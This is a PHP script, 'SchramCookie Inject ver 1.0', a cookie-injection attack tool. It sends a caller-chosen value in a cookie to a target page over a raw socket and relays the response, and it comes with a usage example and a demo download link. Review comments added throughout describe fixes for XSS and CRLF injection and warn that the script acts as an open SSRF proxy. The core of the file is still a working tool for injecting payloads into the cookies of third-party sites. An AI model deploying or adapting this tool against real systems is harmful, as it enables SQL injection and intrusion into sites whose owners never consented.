<?php
/*######################################################################### * /
*
* - >> SchramCookie Inject ver 1.0
* C0de by Nig3h -Greetz To All H3xIe Member.
* link : xiaosan.cnblogs.com
* ex : http://host/this_script.php?url=http://target/page.php?id&id=<value>
*      (url = target page including the parameter name before '='; id = the value sent in the cookie)
*
*######################################################################### */
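ini_set("max_execution_time", 0);
// Pieces of the target URL; filled in by Auto_() and displayed by Printf_Info().
$Current_Host = null;
$Inj_Page = null;
$Query_String = null;
$Self = null;
$Query_Value = null;
// NOTE(review): this script opens a TCP connection to whatever host the caller
// names in ?url= and echoes the response back, i.e. it is an open HTTP proxy /
// SSRF relay for anyone who can reach it. Never leave it on a shared or public host.
if (empty($_GET["url"])) die("<h5>Please Enter Query_String.</h5>");
// ?id= is optional; pass '' instead of an undefined index so the string functions
// downstream never receive null (a notice here, a deprecation in str_replace on 8.1+).
Auto_($_GET["url"], isset($_GET["id"]) ? $_GET["id"] : '');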
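/*
 * Prints the info banner (host, page, parameter name, injected value, date).
 * Reads the globals set by Auto_(); writes HTML to stdout; returns nothing.
 */
function Printf_Info()
{
    GLOBAL $Current_Host, $Inj_Page, $Query_String, $Self, $Query_Value;
    // get_magic_quotes_gpc() was removed in PHP 8.0, where calling it is a fatal
    // "undefined function" error. Magic quotes themselves are gone since 5.4, so
    // report "Off" whenever the function no longer exists.
    $Magic_Quotes_GPC_Bool = False;
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) $Magic_Quotes_GPC_Bool = True;
    $GPC_Status = $Magic_Quotes_GPC_Bool ? "On" : "Off";
    // Every value printed below originates from the request (?url=, ?id=,
    // PHP_SELF/PATH_INFO), so each one is HTML-escaped here; the original echoed
    // them raw, which is a reflected XSS against whoever opens this page.
    $h = function ($v) { return htmlspecialchars((string)$v, ENT_QUOTES, 'UTF-8'); };
    echo '<html>'."\n";
    echo '<head><style type="text/css">'."\n";
    echo 'body{background-color: #CCE8CF; Font-size:12px;}.Style{font-size:11px;}'."\n";
    echo '</style></head>'."\n";
    echo '<body>'."\n";
    echo '<!-- Auth0r : Nig3h -->'."\n";
    echo '<br />'."\n";
    echo '<div align="center" class="Style">';
    echo '$_SERVER[<Font Color="red">PHP_SELF</Font>] : '.$h($Self).'<br />'."\n";
    echo 'HOST : '.$h($Current_Host).'<br />'."\n";
    echo 'Magic_Quotes_GPC : '.'<strong>'.$GPC_Status.'</strong><br />'."\n";
    echo 'Query_String : '.$h($Query_String).'<br />'."\n";
    echo 'GET[ID]_Value : <strong><Font Color="Red">'.$h($Query_Value).'</Font></strong><br />'."\n";
    echo 'Inject Page : '.$h($Inj_Page).'<br />'."\n";
    // NOTE(review): "M-D-Y" yields month, weekday name and year (e.g. Jan-Mon-2024),
    // not the day of the month; "M-d-Y" may have been intended -- confirm before changing.
    echo 'Time : '.Date("M-D-Y").'<br />'."\n";
    echo '<hr>';
    echo '</div>';
    echo '</body>'."\n";
    echo '</html>'."\n";
}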
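/*
 * Splits the caller-supplied target URL into host, page path and the name of the
 * query parameter (text between the last '?' and the next '='), publishes them
 * through the globals, prints the banner and fires the request.
 *   $url  target, e.g. http://target/page.php?id   (must start with http://)
 *   $id   the value that will be sent in the cookie named after the parameter
 * Dies on a non-http:// URL. The original emitted undefined-variable notices and
 * read one byte past the end of the host string on malformed input; every
 * branch below now yields a defined value.
 */
function Auto_($url, $id)
{
    GLOBAL $Query_String, $Current_Host, $Inj_Page, $Query_Value, $Self;
    // POST() below speaks plain HTTP/1.0 on port 80, so only http:// makes sense.
    // (The original also tried to accept "http:\\": after its own backslash
    // substitution that prefix never compared equal, so it was never supported.)
    if (strtolower(substr($url, 0, 7)) !== 'http://') die('<h5>url must start with http://</h5>');
    $after_scheme = (string)substr($url, 7);
    // Host runs up to the first '/', '\' or '?'; with none of them the remainder is the host.
    $host_len = strcspn($after_scheme, "/\\?");
    $_Current_Host = substr($after_scheme, 0, $host_len);
    $Scr_Name = (string)substr($after_scheme, $host_len);   # path + '?' + query
    // Page = path before the LAST '?'. Parameter name = text between that '?' and
    // the next '=' (the original looked for the first '=' anywhere in $Scr_Name,
    // which broke on paths containing '='). Without a '?' the whole path is the page.
    $q_pos = strrpos($Scr_Name, '?');
    if ($q_pos === false) {
        $_Inj_Page = $Scr_Name;
        $_Query_String = '';
    } else {
        $_Inj_Page = substr($Scr_Name, 0, $q_pos);
        $eq_pos = strpos($Scr_Name, '=', $q_pos + 1);
        $_Query_String = ($eq_pos === false)
            ? (string)substr($Scr_Name, $q_pos + 1)
            : substr($Scr_Name, $q_pos + 1, $eq_pos - $q_pos - 1);
    }
    // An empty path would produce an invalid "POST  HTTP/1.0" request line.
    if ($_Inj_Page === '') $_Inj_Page = '/';
    $Query_String = $_Query_String;
    $Current_Host = $_Current_Host;
    $Inj_Page = $_Inj_Page;
    $Query_Value = $id;
    // PHP_SELF can carry attacker-controlled PATH_INFO; Printf_Info() must escape it.
    $Self = isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : '';
    Printf_Info();
    Ini_Main($Current_Host, $Inj_Page, $Query_String, $id);
}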
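/*
 * Builds the Cookie header "<fixed marker>;<param>=<value>", POSTs to the page
 * with an empty body and echoes the (lightly filtered) response.
 *   $Current_Host  target host          $Inj_Page      path POSTed to
 *   $Query_String  cookie/parameter name $id           value placed in that cookie
 */
function Ini_Main($Current_Host, $Inj_Page, $Query_String, $id)
{
    # Config
    $Page_ID = $Query_String;
    $Host = $Current_Host;
    # END_CONFIG
    // Only '=' and ' ' are encoded on purpose: the rest of the value is sent
    // verbatim so the caller controls exactly what reaches the target's cookie
    // parser. CR and LF are additionally encoded (in the value AND the parameter
    // name) because a raw newline would terminate the Cookie header and let the
    // caller append arbitrary request headers or a second request (CRLF injection).
    $inj_id = str_replace(array("=", " ", "\r", "\n"), array("%3D", "%20", "%0D", "%0A"), (string)$id);
    $Page_ID = str_replace(array("\r", "\n"), array("%0D", "%0A"), (string)$Page_ID);
    // NOTE(review): the first cookie is a fixed name/value pair; presumably a marker
    // the demo target expects -- confirm before pointing this at anything else.
    $Cookie_Str = "XUJUSPNGRWXKIXLMZRTR=NGQIVFESDSNWCEBNMJSJDEIAMQVQWZMKOLMOZRCG;"."$Page_ID=$inj_id";
    // No request body: the value travels in the cookie only. The original passed
    // an undefined $Data_Str (null), which strlen() rejects on PHP 8.1+.
    $Data_Str = '';
    $_HTTP_SEND_rs = POST($Host, 80, $Inj_Page, $Data_Str, 1000, $Cookie_Str);
    // NOTE(review): the remote response is echoed as HTML after Kill_Waste(), which
    // only comments out <script>/<style>/<head>; any other active markup from the
    // target (event handlers, <iframe>, <object>, ...) still executes in this page.
    echo $_HTTP_SEND_rs;
}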
/*
 * Lower-cases a chunk of the fetched page and comments out the opening and
 * closing tags of script, style and head so the echoed response renders flat.
 * This is NOT an HTML sanitiser: only these three tag names are touched and
 * every other tag, attribute and event handler passes through unchanged.
 */
function Kill_Waste($str)
{
    // Applied in order, each on the result of the previous one.
    $needles      = array('<script', '</script', '<style', '</style', '<head', '</head');
    $replacements = array('<!-- ',   ' -->',     '<!-- ',  ' -->',    '<!-- ', ' -->');
    return str_replace($needles, $replacements, strtolower($str));
}
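/*
 * Minimal HTTP/1.0 POST over a raw socket.
 *   $host, $port   where to connect      $path     request-line target
 *   $data          request body          $timeout  fsockopen timeout (seconds)
 *   $cookie        raw Cookie header value
 * Returns the response body (headers skipped) after Kill_Waste(); dies on
 * connection failure or on header-injecting input.
 */
function POST($host,$port,$path,$data,$timeout, $cookie='')
{
    // $host, $path and $cookie all come from the caller of this script and land in
    // a request line or header. A CR/LF inside any of them ends that header early
    // and lets the caller add headers of their own (HTTP header injection), so
    // refuse such input rather than send it.
    if (preg_match('/[\r\n]/', $host . $path . $cookie)) {
        die('Refusing to send a request with CR/LF in host, path or cookie');
    }
    $buffer = '';
    $fp = fsockopen($host, $port, $errno, $errstr, $timeout);
    // The error page reflects caller-controlled $host/$path: escape them.
    if (!$fp) die(htmlspecialchars($host.'/'.$path, ENT_QUOTES, 'UTF-8').' : '.htmlspecialchars((string)$errstr, ENT_QUOTES, 'UTF-8').$errno);
    $data = (string)$data;
    fputs($fp, "POST $path HTTP/1.0\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Cookie: $cookie\r\n");
    // Content-length must describe exactly the bytes that follow; the original
    // advertised strlen($data) and then sent $data plus an extra "\r\n\r\n".
    fputs($fp, "Content-length: ".strlen($data)."\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    fputs($fp, $data);
    // Skip status line and headers up to the blank line. fgets() returns false at
    // EOF, and the original's truthiness test also stopped on a header line that
    // is merely falsy ("0"), so compare explicitly.
    while (($line = fgets($fp, 4096)) !== false) {
        if (trim($line) === '') break;
    }
    while (!feof($fp)) {
        $chunk = fgets($fp, 4096);
        if ($chunk === false) break;   // EOF mid-read; strtolower(false) would deprecate
        $buffer .= Kill_Waste($chunk);
    }
    fclose($fp);
    return $buffer;
}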
?>
Download demo:
http://files.cnblogs.com/xiaosan/SchramInj_demo.zip